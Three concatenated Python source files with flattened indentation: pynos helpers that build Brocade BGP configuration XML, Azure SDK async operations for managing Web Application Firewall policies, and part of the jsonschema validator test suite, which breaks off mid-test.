>>> from ipaddress import ip_interface
>>> conn = ('10.24.39.230', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... dev.bgp._multihop_xml(neighbor=ip_interface(unicode(
... '10.10.10.10')), count='5', vrf='default', rbridge_id='1')
... dev.bgp._multihop_xml(
... ip='10.10.10.10') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
KeyError
"""
ip_addr = kwargs.pop('neighbor')
ip = str(ip_addr.ip)
rbr_ns = 'urn:brocade.com:mgmt:brocade-rbridge'
bgp_ns = 'urn:brocade.com:mgmt:brocade-bgp'
config = ET.Element('config')
ele = ET.SubElement(config, 'rbridge-id', xmlns=rbr_ns)
ET.SubElement(ele, 'rbridge-id').text = kwargs.pop('rbridge_id')
ele = ET.SubElement(ele, 'router')
ele = ET.SubElement(ele, 'router-bgp', xmlns=bgp_ns)
ele = ET.SubElement(ele, 'router-bgp-attributes')
ele = ET.SubElement(ele, 'neighbor')
if ip_addr.version == 4:
ele = ET.SubElement(ele, 'neighbor-ips')
ele = ET.SubElement(ele, 'neighbor-addr')
ET.SubElement(ele, 'router-bgp-neighbor-address').text = ip
else:
ele = ET.SubElement(ele, 'neighbor-ipv6s')
ele = ET.SubElement(ele, 'neighbor-ipv6-addr')
ET.SubElement(ele, 'router-bgp-neighbor-ipv6-address').text = ip
ele = ET.SubElement(ele, 'ebgp-multihop')
ET.SubElement(ele, 'ebgp-multihop-count').text = kwargs.pop('count')
return config
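    # Tracing the SubElement calls above, an IPv4 neighbor ('10.10.10.10',
    # count='5', rbridge_id='1') yields this nesting (namespaces and closing
    # tags elided):
    #
    #     <config>
    #       <rbridge-id>
    #         <rbridge-id>1
    #         <router>
    #           <router-bgp>
    #             <router-bgp-attributes>
    #               <neighbor>
    #                 <neighbor-ips>
    #                   <neighbor-addr>
    #                     <router-bgp-neighbor-address>10.10.10.10
    #                     <ebgp-multihop>
    #                       <ebgp-multihop-count>5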
def _update_source_xml(self, **kwargs):
"""Build BGP update source XML.
Do not use this method directly. You probably want ``update_source``.
This currently only supports loopback interfaces.
Args:
rbridge_id (str): The rbridge ID of the device on which BGP will be
configured in a VCS fabric.
neighbor (ipaddress.ip_interface): `ip_interface` object containing
peer IP address (IPv4 or IPv6).
int_type (str): Interface type (loopback)
int_name (str): Interface identifier (1, 5, 7, etc)
Returns:
``ElementTree``: XML for configuring BGP update source.
Raises:
KeyError: if any arg is not specified.
Examples:
>>> import pynos.device
>>> from ipaddress import ip_interface
>>> conn = ('10.24.39.230', '22')
>>> auth = ('admin', 'password')
>>> with pynos.device.Device(conn=conn, auth=auth) as dev:
... output = dev.bgp._update_source_xml(neighbor=ip_interface(
... unicode('10.10.10.10')), rbridge_id='1',
... int_type='loopback', int_name='1')
"""
ip_addr = kwargs.pop('neighbor')
ip = str(ip_addr.ip)
rbr_ns = 'urn:brocade.com:mgmt:brocade-rbridge'
bgp_ns = 'urn:brocade.com:mgmt:brocade-bgp'
config = ET.Element('config')
ele = ET.SubElement(config, 'rbridge-id', xmlns=rbr_ns)
ET.SubElement(ele, 'rbridge-id').text = kwargs.pop('rbridge_id')
ele = ET.SubElement(ele, 'router')
ele = ET.SubElement(ele, 'router-bgp', xmlns=bgp_ns)
ele = ET.SubElement(ele, 'router-bgp-attributes')
ele = ET.SubElement(ele, 'neighbor')
if ip_addr.version == 4:
ele = ET.SubElement(ele, 'neighbor-ips')
ele = ET.SubElement(ele, 'neighbor-addr')
ET.SubElement(ele, 'router-bgp-neighbor-address').text = ip
else:
ele = ET.SubElement(ele, 'neighbor-ipv6s')
ele = ET.SubElement(ele, 'neighbor-ipv6-addr')
ET.SubElement(ele, 'router-bgp-neighbor-ipv6-address').text = ip
ele = ET.SubElement(ele, 'update-source')
ET.SubElement(ele, 'loopback').text = kwargs.pop('int_name')
return config
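# Standalone sketch (not part of pynos): rebuilds the update-source tree shape
# from _update_source_xml above without a device, so the generated XML can be
# inspected offline. The URNs are copied from the methods above; all values
# are placeholders.
if __name__ == '__main__':
    import xml.etree.ElementTree as demo_et

    demo_cfg = demo_et.Element('config')
    demo_rb = demo_et.SubElement(demo_cfg, 'rbridge-id',
                                 xmlns='urn:brocade.com:mgmt:brocade-rbridge')
    demo_et.SubElement(demo_rb, 'rbridge-id').text = '1'
    demo_bgp = demo_et.SubElement(
        demo_et.SubElement(demo_rb, 'router'), 'router-bgp',
        xmlns='urn:brocade.com:mgmt:brocade-bgp')
    demo_neighbor = demo_et.SubElement(
        demo_et.SubElement(demo_bgp, 'router-bgp-attributes'), 'neighbor')
    demo_addr = demo_et.SubElement(
        demo_et.SubElement(demo_neighbor, 'neighbor-ips'), 'neighbor-addr')
    demo_et.SubElement(demo_addr,
                       'router-bgp-neighbor-address').text = '10.10.10.10'
    demo_source = demo_et.SubElement(demo_addr, 'update-source')
    demo_et.SubElement(demo_source, 'loopback').text = '1'
    print(demo_et.tostring(demo_cfg))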
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class WebApplicationFirewallPoliciesOperations:
"""WebApplicationFirewallPoliciesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_03_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.WebApplicationFirewallPolicyListResult"]:
"""Lists all of the protection policies within a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WebApplicationFirewallPolicyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_03_01.models.WebApplicationFirewallPolicyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('WebApplicationFirewallPolicyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies'} # type: ignore
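    # Usage sketch (assumes an authenticated NetworkManagementClient bound to
    # ``client``): the AsyncItemPaged returned here is consumed with
    # ``async for``, which drives prepare_request/get_next transparently:
    #
    #     async for policy in client.web_application_firewall_policies.list(
    #             'my-resource-group'):
    #         print(policy.name)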
def list_all(
self,
**kwargs: Any
) -> AsyncIterable["_models.WebApplicationFirewallPolicyListResult"]:
"""Gets all the WAF policies in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WebApplicationFirewallPolicyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_03_01.models.WebApplicationFirewallPolicyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('WebApplicationFirewallPolicyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies'} # type: ignore
async def get(
self,
resource_group_name: str,
policy_name: str,
**kwargs: Any
) -> "_models.WebApplicationFirewallPolicy":
"""Retrieve protection policy with specified name within a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param policy_name: The name of the policy.
:type policy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WebApplicationFirewallPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_03_01.models.WebApplicationFirewallPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('WebApplicationFirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
async def create_or_update(
self,
resource_group_name: str,
policy_name: str,
parameters: "_models.WebApplicationFirewallPolicy",
**kwargs: Any
) -> "_models.WebApplicationFirewallPolicy":
"""Creates or update policy with specified rule set name within a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param policy_name: The name of the policy.
:type policy_name: str
:param parameters: Policy to be created.
:type parameters: ~azure.mgmt.network.v2020_03_01.models.WebApplicationFirewallPolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WebApplicationFirewallPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_03_01.models.WebApplicationFirewallPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'WebApplicationFirewallPolicy')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WebApplicationFirewallPolicy', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('WebApplicationFirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
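    # Usage sketch (resource names and property values are placeholders; the
    # service may require additional properties such as managed rules):
    #
    #     from azure.mgmt.network.v2020_03_01.models import (
    #         WebApplicationFirewallPolicy,
    #     )
    #     policy = WebApplicationFirewallPolicy(location='westus')
    #     result = await client.web_application_firewall_policies.create_or_update(
    #         'my-resource-group', 'my-waf-policy', policy)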
async def _delete_initial(
self,
resource_group_name: str,
policy_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
policy_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes Policy.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param policy_name: The name of the policy.
:type policy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
policy_name=policy_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
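# Usage sketch (assumes azure-identity and azure-mgmt-network are installed,
# and that subscription/resource names are replaced with real values):
# awaiting begin_delete returns an AsyncLROPoller, so the deletion is only
# complete after awaiting result():
#
#     import asyncio
#     from azure.identity.aio import DefaultAzureCredential
#     from azure.mgmt.network.aio import NetworkManagementClient
#
#     async def delete_policy():
#         async with NetworkManagementClient(
#                 DefaultAzureCredential(), '<subscription-id>') as client:
#             poller = await client.web_application_firewall_policies.begin_delete(
#                 'my-resource-group', 'my-waf-policy')
#             await poller.result()
#
#     asyncio.run(delete_policy())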
|
|
from collections import deque
from contextlib import contextmanager
import json
from jsonschema import FormatChecker, ValidationError
from jsonschema.tests.compat import mock, unittest
from jsonschema.validators import (
RefResolutionError, UnknownType, Draft3Validator,
Draft4Validator, RefResolver, create, extend, validator_for, validate,
)
class TestCreateAndExtend(unittest.TestCase):
def setUp(self):
self.meta_schema = {u"properties" : {u"smelly" : {}}}
self.smelly = mock.MagicMock()
self.validators = {u"smelly" : self.smelly}
self.types = {u"dict" : dict}
self.Validator = create(
meta_schema=self.meta_schema,
validators=self.validators,
default_types=self.types,
)
self.validator_value = 12
self.schema = {u"smelly" : self.validator_value}
self.validator = self.Validator(self.schema)
def test_attrs(self):
self.assertEqual(self.Validator.VALIDATORS, self.validators)
self.assertEqual(self.Validator.META_SCHEMA, self.meta_schema)
self.assertEqual(self.Validator.DEFAULT_TYPES, self.types)
def test_init(self):
self.assertEqual(self.validator.schema, self.schema)
def test_iter_errors(self):
instance = "hello"
self.smelly.return_value = []
self.assertEqual(list(self.validator.iter_errors(instance)), [])
error = mock.Mock()
self.smelly.return_value = [error]
self.assertEqual(list(self.validator.iter_errors(instance)), [error])
self.smelly.assert_called_with(
self.validator, self.validator_value, instance, self.schema,
)
def test_if_a_version_is_provided_it_is_registered(self):
with mock.patch("jsonschema.validators.validates") as validates:
validates.side_effect = lambda version : lambda cls : cls
Validator = create(meta_schema={u"id" : ""}, version="my version")
validates.assert_called_once_with("my version")
self.assertEqual(Validator.__name__, "MyVersionValidator")
def test_if_a_version_is_not_provided_it_is_not_registered(self):
with mock.patch("jsonschema.validators.validates") as validates:
create(meta_schema={u"id" : "id"})
self.assertFalse(validates.called)
def test_extend(self):
validators = dict(self.Validator.VALIDATORS)
new = mock.Mock()
Extended = extend(self.Validator, validators={u"a new one" : new})
validators.update([(u"a new one", new)])
self.assertEqual(Extended.VALIDATORS, validators)
self.assertNotIn(u"a new one", self.Validator.VALIDATORS)
self.assertEqual(Extended.META_SCHEMA, self.Validator.META_SCHEMA)
self.assertEqual(Extended.DEFAULT_TYPES, self.Validator.DEFAULT_TYPES)
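# Illustrative sketch (hypothetical "smelly" keyword, mirroring the mocked
# tests above): create() turns a mapping of keyword callbacks into a validator
# class; each callback receives (validator, value, instance, schema) and
# yields ValidationError instances:
#
#     def smelly(validator, value, instance, schema):
#         if instance != value:
#             yield ValidationError("instance is not smelly enough")
#
#     SmellyValidator = create(meta_schema={}, validators={u"smelly": smelly})
#     SmellyValidator({u"smelly": 12}).validate(12)  # no error raised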
class TestIterErrors(unittest.TestCase):
def setUp(self):
self.validator = Draft3Validator({})
def test_iter_errors(self):
instance = [1, 2]
schema = {
u"disallow" : u"array",
u"enum" : [["a", "b", "c"], ["d", "e", "f"]],
u"minItems" : 3
}
got = (e.message for e in self.validator.iter_errors(instance, schema))
expected = [
"%r is disallowed for [1, 2]" % (schema["disallow"],),
"[1, 2] is too short",
"[1, 2] is not one of %r" % (schema["enum"],),
]
self.assertEqual(sorted(got), sorted(expected))
def test_iter_errors_multiple_failures_one_validator(self):
instance = {"foo" : 2, "bar" : [1], "baz" : 15, "quux" : "spam"}
schema = {
u"properties" : {
"foo" : {u"type" : "string"},
"bar" : {u"minItems" : 2},
"baz" : {u"maximum" : 10, u"enum" : [2, 4, 6, 8]},
}
}
errors = list(self.validator.iter_errors(instance, schema))
self.assertEqual(len(errors), 4)
class TestValidationErrorMessages(unittest.TestCase):
def message_for(self, instance, schema, *args, **kwargs):
kwargs.setdefault("cls", Draft3Validator)
with self.assertRaises(ValidationError) as e:
validate(instance, schema, *args, **kwargs)
return e.exception.message
def test_single_type_failure(self):
message = self.message_for(instance=1, schema={u"type" : u"string"})
self.assertEqual(message, "1 is not of type %r" % u"string")
def test_single_type_list_failure(self):
message = self.message_for(instance=1, schema={u"type" : [u"string"]})
self.assertEqual(message, "1 is not of type %r" % u"string")
def test_multiple_type_failure(self):
types = u"string", u"object"
message = self.message_for(instance=1, schema={u"type" : list(types)})
self.assertEqual(message, "1 is not of type %r, %r" % types)
def test_object_without_title_type_failure(self):
type = {u"type" : [{u"minimum" : 3}]}
message = self.message_for(instance=1, schema={u"type" : [type]})
self.assertEqual(message, "1 is not of type %r" % (type,))
def test_object_with_name_type_failure(self):
name = "Foo"
schema = {u"type" : [{u"name" : name, u"minimum" : 3}]}
message = self.message_for(instance=1, schema=schema)
self.assertEqual(message, "1 is not of type %r" % (name,))
def test_minimum(self):
message = self.message_for(instance=1, schema={"minimum" : 2})
self.assertEqual(message, "1 is less than the minimum of 2")
def test_maximum(self):
message = self.message_for(instance=1, schema={"maximum" : 0})
self.assertEqual(message, "1 is greater than the maximum of 0")
def test_dependencies_failure_has_single_element_not_list(self):
depend, on = "bar", "foo"
schema = {u"dependencies" : {depend : on}}
message = self.message_for({"bar" : 2}, schema)
self.assertEqual(message, "%r is a dependency of %r" % (on, depend))
def test_additionalItems_single_failure(self):
message = self.message_for(
[2], {u"items" : [], u"additionalItems" : False},
)
self.assertIn("(2 was unexpected)", message)
def test_additionalItems_multiple_failures(self):
message = self.message_for(
[1, 2, 3], {u"items" : [], u"additionalItems" : False}
)
self.assertIn("(1, 2, 3 were unexpected)", message)
def test_additionalProperties_single_failure(self):
additional = "foo"
schema = {u"additionalProperties" : False}
message = self.message_for({additional : 2}, schema)
self.assertIn("(%r was unexpected)" % (additional,), message)
def test_additionalProperties_multiple_failures(self):
schema = {u"additionalProperties" : False}
message = self.message_for(dict.fromkeys(["foo", "bar"]), schema)
self.assertIn(repr("foo"), message)
self.assertIn(repr("bar"), message)
self.assertIn("were unexpected)", message)
def test_invalid_format_default_message(self):
checker = FormatChecker(formats=())
check_fn = mock.Mock(return_value=False)
checker.checks(u"thing")(check_fn)
schema = {u"format" : u"thing"}
message = self.message_for("bla", schema, format_checker=checker)
self.assertIn(repr("bla"), message)
self.assertIn(repr("thing"), message)
self.assertIn("is not a", message)
class TestValidationErrorDetails(unittest.TestCase):
# TODO: These really need unit tests for each individual validator, rather
# than just these higher level tests.
def test_anyOf(self):
instance = 5
schema = {
"anyOf": [
{"minimum": 20},
{"type": "string"}
]
}
validator = Draft4Validator(schema)
errors = list(validator.iter_errors(instance))
self.assertEqual(len(errors), 1)
e = errors[0]
self.assertEqual(e.validator, "anyOf")
self.assertEqual(e.validator_value, schema["anyOf"])
self.assertEqual(e.instance, instance)
self.assertEqual(e.schema, schema)
self.assertIsNone(e.parent)
self.assertEqual(e.path, deque([]))
self.assertEqual(e.relative_path, deque([]))
self.assertEqual(e.absolute_path, deque([]))
self.assertEqual(e.schema_path, deque(["anyOf"]))
self.assertEqual(e.relative_schema_path, deque(["anyOf"]))
self.assertEqual(e.absolute_schema_path, deque(["anyOf"]))
self.assertEqual(len(e.context), 2)
e1, e2 = sorted_errors(e.context)
self.assertEqual(e1.validator, "minimum")
self.assertEqual(e1.validator_value, schema["anyOf"][0]["minimum"])
self.assertEqual(e1.instance, instance)
self.assertEqual(e1.schema, schema["anyOf"][0])
self.assertIs(e1.parent, e)
self.assertEqual(e1.path, deque([]))
self.assertEqual(e1.absolute_path, deque([]))
self.assertEqual(e1.relative_path, deque([]))
self.assertEqual(e1.schema_path, deque([0, "minimum"]))
self.assertEqual(e1.relative_schema_path, deque([0, "minimum"]))
self.assertEqual(
e1.absolute_schema_path, deque(["anyOf", 0, "minimum"]),
)
self.assertFalse(e1.context)
self.assertEqual(e2.validator, "type")
self.assertEqual(e2.validator_value, schema["anyOf"][1]["type"])
self.assertEqual(e2.instance, instance)
self.assertEqual(e2.schema, schema["anyOf"][1])
self.assertIs(e2.parent, e)
self.assertEqual(e2.path, deque([]))
self.assertEqual(e2.relative_path, deque([]))
self.assertEqual(e2.absolute_path, deque([]))
self.assertEqual(e2.schema_path, deque([1, "type"]))
self.assertEqual(e2.relative_schema_path, deque([1, "type"]))
self.assertEqual(e2.absolute_schema_path, deque(["anyOf", 1, "type"]))
self.assertEqual(len(e2.context), 0)
def test_type(self):
instance = {"foo": 1}
schema = {
"type": [
{"type": "integer"},
{
"type": "object",
"properties": {
"foo": {"enum": [2]}
}
}
]
}
validator = Draft3Validator(schema)
errors = list(validator.iter_errors(instance))
self.assertEqual(len(errors), 1)
e = errors[0]
self.assertEqual(e.validator, "type")
self.assertEqual(e.validator_value, schema["type"])
self.assertEqual(e.instance, instance)
self.assertEqual(e.schema, schema)
self.assertIsNone(e.parent)
self.assertEqual(e.path, deque([]))
self.assertEqual(e.relative_path, deque([]))
self.assertEqual(e.absolute_path, deque([]))
self.assertEqual(e.schema_path, deque(["type"]))
self.assertEqual(e.relative_schema_path, deque(["type"]))
self.assertEqual(e.absolute_schema_path, deque(["type"]))
self.assertEqual(len(e.context), 2)
e1, e2 = sorted_errors(e.context)
self.assertEqual(e1.validator, "type")
self.assertEqual(e1.validator_value, schema["type"][0]["type"])
self.assertEqual(e1.instance, instance)
self.assertEqual(e1.schema, schema["type"][0])
self.assertIs(e1.parent, e)
self.assertEqual(e1.path, deque([]))
self.assertEqual(e1.relative_path, deque([]))
self.assertEqual(e1.absolute_path, deque([]))
self.assertEqual(e1.schema_path, deque([0, "type"]))
self.assertEqual(e1.relative_schema_path, deque([0, "type"]))
self.assertEqual(e1.absolute_schema_path, deque(["type", 0, "type"]))
self.assertFalse(e1.context)
self.assertEqual(e2.validator, "enum")
self.assertEqual(e2.validator_value, [2])
self.assertEqual(e2.instance, 1)
self.assertEqual(e2.schema, {u"enum" : [2]})
self.assertIs(e2.parent, e)
self.assertEqual(e2.path, deque(["foo"]))
self.assertEqual(e2.relative_path, deque(["foo"]))
